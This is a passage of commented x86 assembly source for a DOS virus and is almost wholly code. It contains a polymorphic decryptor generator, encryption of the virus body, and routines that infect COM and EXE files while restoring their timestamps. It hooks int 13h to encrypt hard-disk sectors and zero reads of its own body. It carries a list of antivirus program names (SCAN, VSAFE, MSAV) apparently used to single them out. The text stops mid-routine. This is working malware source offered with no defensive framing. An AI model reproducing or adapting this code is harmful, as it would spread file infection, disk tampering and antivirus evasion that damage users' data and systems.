db 01h push_what db 0eh ; db 01h db 1fh ; db 03h mov_index_? db 0bfh viruz_start dw 0582h ; db 03h mov_?_instr db 0b8h crypt_viruz_value dw ; db 02h db 31h xor_?_instr db 05h ; db 04h db 81h add_?_instr db 0c0h next_crypt_value_ dw ; db 01h inc_?_instr db 47h ; db 04h db 81h cmp_index_? db 0ffh viruz_end dw 135ah ; db 02h db 75h db 0efh ; ; unimportant_instr: ; nop stc clc sti db 2Eh db 36h db 3Eh cld std cmc ;

; instruction_length ; push cs or push ss ; instruction_length ; pop ds ; instruction_length ; mov ?_index_reg, im16 ; im16 ; instruction_length ; mov ?_reg, im16 0bfbah ; im16 ; instruction_length ; xor [index_reg], ?_reg ; ModR/M ; instruction_length ; add ?_reg, im16 ; ModR/M, opcode 6efeh ; im16 ; instruction_length ; inc ?_reg ; instruction_length ; cmp ?_index_reg, im16 ; ModR/M, opcode ; im16 ; instruction_length ; jnz disp8

; cs: ; ss: ; ds:

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Diz movez unimportant_instr 2 buffer ; in : dx = wieviel :-) sub_0B57 proc near or dx, dx ; count is null ? jz short loc_ret_0B71 push si push cx ; push regz push dx mov cx, dx ; count 2 cx

locloop_0B60: mov si, mov dx, call add si, movsb loop

offset unimportant_instr - p 0Ah ; max_random 2 0ah (10 instr) random_number ; gimme random_number dx ; go2 instruction ; move it locloop_0B60 ; and go on

pop dx pop cx pop si

; restore regz

loc_ret_0B71: retn sub_0B57 endp

; and end ...

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Diz putz be4 and after instruction unimportant_instructionz ; in : dx = wieviel u_instr sub_0B72 proc near mov ax, dx ; instr_count 2 ax inc dx call random_number ; gimme random_number sub ax, dx ; sub cur_instr_count from ; instr_count call sub_0B57 ; move unimportant_instr xchg dx, ax rep movsb ; move real_instruction db 81h,0FBh ; cmp bx, offset jnz_offset - p dw offset jnz_offset - p ; it'z last_one ? (jnz xor_...) jnz short loc_0B92 mov ax, ds:[xor_offset - p] ; gimme xor_offset sub ax, di ; sub cur_instr_buffer_index add ax, offset instr_buffer - p; add instr_buffer_back sub ax, [bx] ; sub jnz_offset dec di ; go2 disp8 stosb ; and store it loc_0B92: call sub_0B57 ; and now put some u_instr ; after real_instruction retn ; and end ... sub_0B72 endp m_?_i x_?_i a_?_i m_i_? x_?_i_ i_?_i c_i_?

dw dw dw dw dw dw dw

offset offset offset offset offset offset offset

mov_?_instr xor_?_instr add_?_instr mov_index_? xor_?_instr inc_?_instr cmp_index_?

-

p p p p p p p

; ; ; ; ; ; ;

0b38h 0b3dh 0b40h 0b34h 0b3dh 0b44h 0b47h

; ; ; ; ; ; ;

0b96h 0b98h 0b9ah 0b9ch 0b9eh 0ba0h 0ba2h

; ; ; ; ; ; ;

0614h 0616h 0618h 061ah 061ch 061eh 0620h

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; This sets rite ModR/M instructions .... ; There are two phases here: ; 1. : m_?_i - a_?_i = sets instruction that worx with xor_reg ; 2. : m_i_? - c_i_? = sets instruction that worx with index_reg ; in : dl = random_number that depends on phase

; Just go through it and try to know what's happening here :) sub_0BA4 proc near loc_0BA4: lodsw xchg di, ax mov al, dl cmp si, offset i_?_i - p jne short loc_0BB6 and al, 5 cmp al, 1 jne short loc_0BC6 mov al, 7 loc_0BB6: cmp si, offset a_?_i - p jne short loc_0BC6 mov cl, 3 shl al, cl or [di], al or al, 0C7h jmp short loc_0BCA loc_0BC6: or [di], al or al, 0F8h loc_0BCA: and [di], al cmp si, offset m_i_? - p je short loc_ret_0BDA cmp si, offset sub_0BA4 - p je short loc_ret_0BDA jmp short loc_0BA4 loc_ret_0BDA: retn sub_0BA4 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Diz preparez decode_routine ... sub_0BDB proc near mov dx, 2 call random_number ; gimme random_number mov byte ptr ds:[push_what - p], 0Eh; store push_cs or dx, dx ; random_number nullovy ? jz short loc_0BEF mov byte ptr ds:[push_what - p], 16h; nope so store ; push_ss loc_0BEF: mov si, offset m_?_i - p ; start with first_phaze loc_0BF2: mov dx, 8 call random_number ; gimme random_number cmp dl, 4 ; we don't need sp_reg je loc_0BF2 mov bl, dl ; reg 2 bl call sub_0BA4 ; set instructionz etc. mov si, offset m_i_? - p ; start with second_phaze loc_0C05: mov dx, 3 call random_number ; gimme random_number add dl, 6 cmp dl, 8

jne short loc_0C15 mov dl, 3 ; yope set bx_reg loc_0C15: cmp dl, bl ; xor_reg = index_reg ? je loc_0C05 call sub_0BA4 ; nope so set instr. etc. xor cx, cx mov di, offset decode_routine_table - p loc_0C21: cmp cx, 9 ; jnz_instruction ? jne short loc_0C40 loc_0C26: ; yope ; it'z jnz disp8 ; so it must be in the range ; 0 - 80h bytez mov dx, 0C8h call random_number ; gimme random_number sub dx, 64h ; sub 0c8h / 2 add dx, ds:[xor_offset - p] ; add xor_offset cmp dx, 0 ; less than 0 ? jl loc_0C26 cmp dx, ds:[max_number - p] ; more or same than max_number? jge loc_0C26 jmp short loc_0C46 loc_0C40: db 0bah ; mov dx, ? max_number dw 466h ; random_max iz max_number call random_number ; gimme random_number loc_0C46: jcxz short loc_0C5F ; first timez here ? mov si, offset decode_routine_table - p push cx ; nope locloop_0C4C: ; so go2 cur_instr and check ; 4 distancez lodsw sub ax, dx ; check 4 distance cmp ax, 0Ah ; more or same than 0ah bytez ? jge loc_0C5C cmp ax, 0FFF6h ; less or same than 0ah bytez ? jle loc_0C5C pop cx ; nope ! get another random_# jmp loc_0C21 loc_0C5C: ; yope loop locloop_0C4C ; so go2 next insrt pop cx ; last_one loc_0C5F: xchg dx, ax ; random_number 2 ax stosw ; store it 2 decode_... inc cx ; inc counter cmp cx, 0Ah ; less than 0ah (10 piecez) ? jb loc_0C21 ; nope = decode_routine_table ; initialized ... mov bx, offset decode_routine_table - p mov si, offset instr_start - p loc_0C6D: mov di, offset instr_buffer - p lodsb ; read instr_length mov cl, al ; instr_length 2 cx mov dx, 8 ; u_instr 2 dx sub dx, cx ; sub it mov ax, [bx+2] ; gimme next_d_entry_offset ; if jnz_instr next iz

; viruz_beginning ... sub ax, [bx] ; sub from it cur_d_entry cmp ax, 0Ah ; distance 0ah ? jne short loc_0C8B inc dx ; inc u_instr (we don't need inc dx ; jmp_instr ...) call sub_0B72 inc bx ; go2 next decode_routine_ inc bx ; _offset jmp short loc_0CB5 ; and go on loc_0C8B: ; nope call random_number ; gimme random_number call sub_0B72 ; copy instruction 2 buffer ... mov dx, di ; gimme instr_buffer_offset sub dx, offset three_bytez - p; sub ofs instr_buffer - 3 add dx, [bx] ; add cur_d_entry mov al, 0E9h ; far_jmp 2 al stosb ; store it inc bx ; go2 next_entry inc bx mov ax, [bx] ; gimme it sub ax, dx ; sub it cmp ax, 7Eh ; distance more than 7eh ? jg short loc_0CB4 cmp ax, 0FF7Fh ; distance less than 0ff7fh ? jl short loc_0CB4 inc ax ; nope inc distance (jmp_short ; only 2 bytez ...) mov byte ptr [di-1], 0EBh ; store rather jmp_short stosb ; store disp8 jmp short loc_0CB5 ; and go on loc_0CB4: ; yope stosw ; store disp16 loc_0CB5: push bx push cx db 0b9h ; mov cx, 0 mov_cx_?_ dw 0 ; gimme file_pointer db 0bah ; mov dx, 13h mov_dx_?_ dw 13h add dx, [bx-2] ; add decode_table_entry adc cx, 0 ; (the current) push cx push dx call sub_0E63 ; go2 f_ptr mov cx, 0Ah ; read 0ah bytez db 0bah ; mov dx, ? buffer_offset dw 0a4h ; 2 [buffer_offset] add ds:[buffer_offset - p], cx; go2 next_buffer_offset_entry call f_read_ pop dx pop cx jc short loc_0CE6 ; error ? call sub_0E63 ; go back 2 f_ptr xchg cx, di ; cur_instr_buffer_offset 2 cx mov dx, offset instr_buffer - p; sub offset instr_buffer sub cx, dx ; sub it 2 get instr_size call f_write_ ; and write it ... loc_0CE6: pop cx pop bx jc short loc_ret_0CF3 ; error ? db 81h,0FBh ; cmp bx, offset beginning_ofs - p

dw offset beginning_ofs - p jnc short loc_ret_0CF3 ; last decode_routine_entry ? jmp loc_0C6D ; nope so go on ... loc_ret_0CF3: retn sub_0BDB endp

; yope ; so end ...

; Purpose of moving to buffer: ; while writing viruz_body to file, the virus crypts viruz_body so ; int_13h and crypt_routine and routine that writes it to file ; far far away from range of crypt_routine presun_rutiny: mov cx, offset buffer - p ; gimme size 2 write xor dx, dx ; start with offset null call sub_0D12 ; crypt_ it mov ah, 40h ; write crypted_ viruz_body mov bx, ds:[handle - p] ; 2 file; gimme handle pushf ; and db 9Ah ; call far ptr old_int_21h old_int_21h dw 0, 0 jc short loc_0D0C ; error ? cmp ax, cx ; written_&_wanted the same ? loc_0D0C: pushf ; push flagz call sub_0D12 ; decrypt_ viruz_body popf ; restore flagz retn ; and end ... ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Diz cryptz_ viruz_body sub_0D12 proc near push cx mov si, dx ; gimme viruz_start_offset db 0b8h ; mov ax, 0 crypt_viruz dw 0 ; gimme init_crypt_vale mov cx, offset buffer - p ; gimme viruz_size locloop_0D1B: xor [si], ax ; crypt_it db 05h ; add ax, ? next_crypt_value dw 0 ; go2 next_crypt_value inc si ; go2 next viruz_byte loop locloop_0D1B ; and go on pop cx retn sub_0D12 endp

; and end ...

new_int_24h: mov al, 3 iret ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Diz callz old_int_13h sub_0D28 proc near pushf call dword ptr cs:[old_int_13h - p__] retn

sub_0D28

endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Diz getz cylinder_number in si sub_0D2F proc near push cx push dx shr cl, 1 shr cl, 1 and dh, 0C0h or dh, cl mov cl, 4 shr dh, cl mov dl, ch xchg si, dx pop dx pop cx retn sub_0D2F endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Diz cryptz_ a buffer crypt_ proc near push ax push bx ; push regz push cx db 0b0h ; mov al, ? secz_count db 0 ; gimme secz_count db 0bbh ; mov bx, ? buf_ptr dw 0 ; gimme buf_ptr loc_0D4D: mov cx, 100h ; do it 256* ; (in wordz) locloop_0D50: db 26h, 81h, 37h ; xor word ptr es:[bx], ? crypt_value dw 2b50h ; xor word ... inc bx ; go2 next_word in buffer inc bx loop locloop_0D50 ; and go on

crypt_

dec al jnz loc_0D4D pop cx pop bx pop ax retn endp

; dec secz_count ; last one ? ; yope ; restore regz

new_int_13h: cmp ah, 2 je short loc_0D6E cmp ah, 3 je short loc_0D6E jmp loc_0E50 loc_0D6E: cmp dx, 80h

; and end ...

; read sector(z) ? ; write sector(z) ? ; nope so end ; 0.head, first_harddisk ?

jne short loc_0DE0 test cx, 0FFC0h ; cylinder is null ? jnz short loc_0DE0 push bx ; ok it could be work with push dx ; partition_table or with push si ; viruz_body push di push cx push cx mov si, ax ; gimme ax_reg and si, 0FFh ; gimme secz_2_work mov di, si mov al, 1 push ax jz short loc_0DBB ; secz_2_work is null ? jcxz short loc_0DDB ; sec_number is null ? cmp cl, 1 ; work with parition_table ? je short loc_0DCD loc_0D94: ; nope so it could be viruz db 80h, 0f9h ; body max_sektor db 11h ; cmp cl, ? ja short loc_0DDB ; are we in the range db 80h, 0f9h ; cmp cl, ? partition_sec_n db 0ah ; where'z viruz_body ? jb short loc_0DD2 cmp ah, 3 ; yope = writing ? je short loc_0DDB ; (end_with error) push bx mov cx, 200h ; do it 512* locloop_0DA7: mov byte ptr es:[bx], 0 ; store null inc bx ; inc buffer_ptr loop locloop_0DA7 ; and go on ... pop bx loc_0DAF: add bx, 200h ; go2 next_sec_in_buffer pop ax pop cx inc cx ; inc sec_number push cx push ax dec si ; dec secz_2_work jnz loc_0D94 ; null ? loc_0DBB: clc loc_0DBC: ; yope pop ax ; restore ax_reg pushf xchg di, ax ; secz_2_work 2 ax sub ax, si ; sub secz_that_weren't_read popf mov ah, ch ; error number 2 ah pop cx pop cx pop di ; restore regz pop si pop dx pop bx retf 2 ; and end ... loc_0DCD: mov cl, byte ptr cs:[partition_sec_n - p__] ; yope

; so gimme parition_table_sec loc_0DD2: call sub_0D28 ; write or read it mov ch, ah ; gimme possible_error_number jc loc_0DBC ; error ? jmp short loc_0DAF ; nope = go on loc_0DDB: ; yope stc ; so set up error_flag mov ch, 0BBh ; and error_number 2 ch jmp short loc_0DBC ; (undefined_error) loc_0DE0: ; nope cmp dl, 80h ; it'z first_harddisk ? jne short loc_0E50 push ax push cx push dx push si ; push regz push ds push cs pop ds mov byte ptr ds:[secz_count - p__], 0 ; store null mov word ptr ds:[buf_ptr - p__], bx ; store bx call sub_0D2F ; gimme cylinder_number and cl, 3Fh ; voklesti sector and dh, 3Fh ; voklesti head loc_0DFE: or al, al ; secz_2_work is null ? jz short loc_0E31 db 81h, 0feh ; cmp si, ? max_cyl_number dw 265h ; are we in the range jae short loc_0E31 ; where'z harddisk db 81h, 0feh ; cmp si, ? cur_cyl_number dw 1234h ; crypted_ ? jb short loc_0E14 inc byte ptr ds:[secz_count - p__] ; yope inc secz_count jmp short loc_0E1A loc_0E14: add word ptr ds:[buf_ptr - p__], 200h; go2 next_sec_in_buf loc_0E1A: dec al ; dec secz_2_work inc cl db 80h, 0f9h ; cmp cl, ? max_sektor_2 db 11h ; sector in range ? jbe loc_0DFE mov cl, 1 ; nope so sector 2 1 inc dh ; and inc head db 80h, 0feh ; cmp dh, ? max_heads db 07h ; head in range ? jbe loc_0DFE xor dh, dh ; nope so head 2 null inc si ; and inc cylinder jmp short loc_0DFE ; and go on loc_0E31: ; yope cmp byte ptr ds:[secz_count - p__], 0; must we (un)crypt_ pop ds ; something ? pop si ; restore regz pop dx pop cx pop ax jz short loc_0E50 cmp ah, 2 ; yope; read ? je short loc_0E45 call crypt_ ; nope write; crypt_ it

loc_0E45: call sub_0D28 pushf call crypt_ popf retf 2 loc_0E50: db 0EAh old_int_13h label near

; do it ; and uncrypt_ it

; end ... ; jmp far ptr old_int_13h

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Diz writez 2 file ... f_write_ proc near mov ah, 40h jmp $ + 4 f_write_ endp ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Diz readz from file ... f_read_ proc near mov ah, 3Fh ; '?' call sub_0E6F jc short loc_ret_0E5E cmp ax, cx loc_ret_0E5E: retn f_read_ endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Diz call f_ptr fc sub_0E5F proc near xor cx, cx mov dx, cx sub_0E63: mov ax, 4200h jmp short loc_0E6F sub_0E68: xor cx, cx mov dx, cx sub_0E6C: mov ax, 4202h sub_0E6F: loc_0E6F: mov bx, word ptr cs:[handle - p] ; Diz call old_int_21h int_21h: pushf cli call dword ptr cs:[old_int_21h - p__] retn sub_0E5F endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Diz infectz the file ... sub_0E7C proc near mov bp, sp mov ax, 5700h ; gimme file_time_&_date call sub_0E6F mov bx, offset file_time_date - p mov [bx], cx ; store time_stamp mov [bx+2], dx ; store date_stamp call sub_1157 ; file already infected ? jc short loc_0F0A mov dx, 1Eh call random_number ; gimme random_number or dx, dx ; null ? jz short loc_0E9D mov [bx], ax ; nope so store new_time_stamp loc_0E9D: mov word ptr ds:[buffer_offset - p], offset overwritten_bytez - p mov dx, 0FFFFh push dx call random_number ; gimme random_number mov ds:[crypt_viruz_value - p], dx ; store it mov ds:[crypt_viruz - p__], dx ; store it pop dx call random_number ; gimme next_random_number mov ds:[next_crypt_value_ - p], dx ; store it mov ds:[next_crypt_value - p__], dx ; store it call sub_0E5F ; go2 sof mov cx, 1Ah ; read 1ah_bytez mov dx, offset file_buffer - p; 2 file_buffer push dx ; (exe_hdr or 3bytez from com) call f_read_ ; read it jc short loc_0F24 ; error ? xchg si, dx ; move these mov di, offset exe_header - p rep movsb ; bytez call sub_0E68 ; go2 eof mov si, ax ; size in ax : dx mov di, dx ; 2 si : di pop bx cmp word ptr [bx], 4D5Ah ; 'MZ' ? je short loc_0EFA ; it'z exe_file ? cmp word ptr [bx], 5A4Dh ; 'ZM' ? je short loc_0EFA ; it'z exe_file ? mov byte ptr ds:[exe_flag - p], 0; nope = clear exe_flag cmp ax, 0EFA6h ; file not 2 big ? cmc jc short loc_0F24 mov ax, 3 ; nope cwd ; null dx_reg push bx jmp short loc_0F16 loc_0EFA: mov byte ptr ds:[exe_flag - p], 1 ; set up exe_flag mov ax, [bx+4] ; gime page_cnt mul word ptr ds:[page_size_ - p] ; mul it with page_size sub ax, si sbb dx, di loc_0F0A: jc short loc_0F24 mov ax, [bx+8] ; gimme hdr_size

mul word ptr ds:[hdr_size_ - p] ; mul it with hdr_size push bx push ax push dx loc_0F16: sub si, ax ; sub hdr_size sbb di, dx ; or 3 bytez 4 far_jmp or di, di ; file bigger than 0ffffh bytez ? jnz short loc_0F2C mov dx, si ; nope sub dx, 3E8h ; so check whether the file loc_0F24: ; iz not 2 small jc short loc_0F98 cmp dx, 7D0h ; size less than 7d0h ? jbe short loc_0F2F loc_0F2C: mov dx, 7D0h ; set max_number 2 7d0h loc_0F2F: call random_number ; gimme random_number add dx, 3E8h ; add 7d0h / 2 mov ds:[viruz_start - p], dx ; store viruz_start add dx, offset buffer - p + 280h ; add dx viruz_size ; + space 4 stack cmp byte ptr ds:[exe_flag - p], 0 ; exe_file ? je short loc_0F49 mov ds:[file_buffer - p + 10h], dx ; yope store new exe_sp loc_0F49: add dx, 0FD80h ; sub 280h mov ds:[viruz_end - p], dx ; store viruz_end add dx, 0 - (offset buffer - offset loc_08d1) mov ds:[beginning_ofs - p], dx; store beginning_ofs add dx, 0 - (offset loc_08d1 - offset loc_0582) - 9 mov ds:[max_number - p], dx ; store max_number add dx, 8 ; add 8 (viz up - 9 ...) not dx ; make signed_number mov cx, 0FFFFh ; the f_ptr functionz ; are signed ; so it will sub from the eof ; cx : dx ... call sub_0E6C mov ds:[mov_cx_?_ - p], dx ; store new_file_poz mov ds:[mov_dx_?_ - p], ax ; as a base ... cmp byte ptr ds:[exe_flag - p], 0 ; com_file ? jne short loc_0F81 xchg dx, ax ; gimme base add dx, 100h ; add 100h jmp short loc_0F8B ; and go on loc_0F81: pop di pop si sub ax, si ; count base_addr sbb dx, di div word ptr ds:[hdr_size_ - p] loc_0F8B: add ds:[viruz_start - p], dx; add base add ds:[viruz_end - p], dx ; add base push ax push dx call sub_0BDB ; ok now prepare decode_rout... loc_0F98: jc short loc_0FFE ; error ? pop dx ; and now add base pop ax ; 2 decode_routine_table_

mov cx, 0Ah ; _entryz ... mov si, offset decode_routine_table - p locloop_0FA2: add [si], dx ; add base inc si ; go2 next_entry inc si loop locloop_0FA2 ; and go on ... pop cmp jne mov mov sub

bx byte ptr ds:[exe_flag - p], 0 ; com_file ? short loc_0FD0 byte ptr [bx], 0E9h ; store far_jump ax, ds:[decode_routine_table - p]; gimme jump_offset ax, 103h ; sub 103h (100h PSP and 03h ; far_jmp) [bx+1], ax ; store it word ptr ds:[relo_cnt - p], 0; store relo_cnt word ptr ds:[relo_cs - p], 0FFF0h; store relo_cs word ptr ds:[exe_ip - p], 100h; store exe_ip short loc_0FF7 ; and go on ; nope exe_file [bx+16h], ax ; store relo_cs [bx+0Eh], ax ; store relo_ss ax, ds:[decode_routine_table - p]; gimme starting_ofs [bx+14h], ax ; store exe_ip [bx+10h], dx ; add it 2 exe_sp word ptr [bx+6], 0 ; null relo_cnt ax, 28h ; my_min_mem 2 ax [bx+0Ah], ax ; compare it with min_mem short loc_0FEF ; more ? [bx+0Ah], ax ; yope so store my_min_mem

mov mov mov mov jmp loc_0FD0: mov mov mov mov add mov mov cmp jae mov loc_0FEF: cmp [bx+0Ch], ax ; compare it with max_mem jae short loc_0FF7 ; more ? mov [bx+0Ch], ax ; yope so store my_max_mem loc_0FF7: push bx call sub_0E68 ; go2 eof db 0e8h ; call presun_rutiny ( ; viruz_body_crypt_&_write) dw offset presun_rutiny - presun_rutiny + buffer - next___ next___ label near ; crypt_ it and write it loc_0FFE: jc short loc_1031 call sub_0E68 ; go2 eof div word ptr ds:[page_size_ - p] ; div new_file_size inc ax ; 2 count pagez pop bx cmp byte ptr ds:[exe_flag - p], 0 ; exe_file ? je short loc_1016 mov [bx+4], ax ; store new page_cnt mov [bx+2], dx ; store new part_pag loc_1016: push bx call sub_0E5F ; go2 sof mov cx, 1Ah pop dx call f_write_ ; write new_exe_header 2 file jc short loc_1031 ; error ? mov ax, 5701h ; set back file_time_date mov cx, ds:[file_time_date - p] ; gimme time_stamp mov dx, ds:[file_time_date - p + 2] ; gimme date_stamp

call sub_0E6F loc_1031: mov sp, bp retn sub_0E7C endp

; set it

; and end ...

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Diz setz my own error_handler sub_1034 proc near push dx push ds push cs pop ds mov ax, 3524h ; gimme old_int_24h call int_21h mov ds:[old_int_24h - p + 2], es ; store it mov ds:[old_int_24h - p], bx mov ax, 2524h ; and set my own mov dx, offset new_int_24h - p__ ; handler call int_21h pop ds pop dx retn ; and end ... sub_1034 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Diz setz back old_int_24h sub_1052 proc near mov ax, 2524h lds dx, dword ptr cs:[old_int_24h - p]; gimme old_int_24h call int_21h ; set it back retn ; and end ... sub_1052 endp _com_ _exe_ _scan_ _clean_ _findviru_ _guard_ _nod_ _vsafe_ _msav_ _chkdsk_

db db db db db db db db db db

04h, 04h, 04h, 05h, 08h, 05h, 03h, 05h, 04h, 06h,

'.COM' '.EXE' 'SCAN' 'CLEAN' 'FINDVIRU' 'GUARD' 'NOD' 'VSAFE' 'MSAV' 'CHKDSK'

; offset 105eh ; offset 1063h ; offset 1068h ; offset 106dh ; offset 1073h ; offset 107ch ; offset 1082h ; offset 1086h ; offset 108ch ; offset 1091h

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Diz checkz the file_name and drive ... sub_1098 proc near push dx push bx push cx push si push di ; push regz push ds push es

push mov si, mov di, push pop es lea bx, mov cx,

ax dx ; gimme file_name_offset name_buffer - p ; gimme buffer where 2 store cs [di-1] 4Bh

; try it 4bh*

locloop_10AD: lodsb ; read byte cmp al, 61h ; 'a' jb short loc_10B8 ; low_case ? cmp al, 7Ah ; 'z' ja short loc_10B8 sub al, 20h ; yope so make high_case loc_10B8: push ax push si loc_10BA: ; nope cmp al, 20h ; space ? jne short loc_10C7 lodsb ; read byte or al, al ; null ? jnz loc_10BA pop si ; yope pop si jmp short loc_10D7 ; end ... loc_10C7: pop si pop ax cmp al, 5Ch ; '\' je short loc_10D5 cmp al, 2Fh ; '/' je short loc_10D5 cmp al, 3Ah ; ':' jne short loc_10D7 loc_10D5: mov bx, di ; store offset 2 bx loc_10D7: stosb ; store byte or al, al ; null ? jz short loc_10DE loop locloop_10AD ; and go on loc_10DE: ; yope mov si, offset _com_ - p ; check 4 .COM or .EXE sub di, 5 ; sub 5 (.XXX, 0) push cs pop ds call sub_1149 ; it'z .COM ? jz short loc_10F0 call sub_1149 ; it'z .EXE ? jnz short loc_113C loc_10F0: ; yope pop ax push ax xchg di, bx ; gimme file_name_offset inc di ; inc it (/, \, or : ...) cmp ax, 4B00h ; fc run file ? jne short loc_1107 mov si, offset _chkdsk_ - p call sub_1149 ; do we run CHKDISK ? jnz short loc_1107

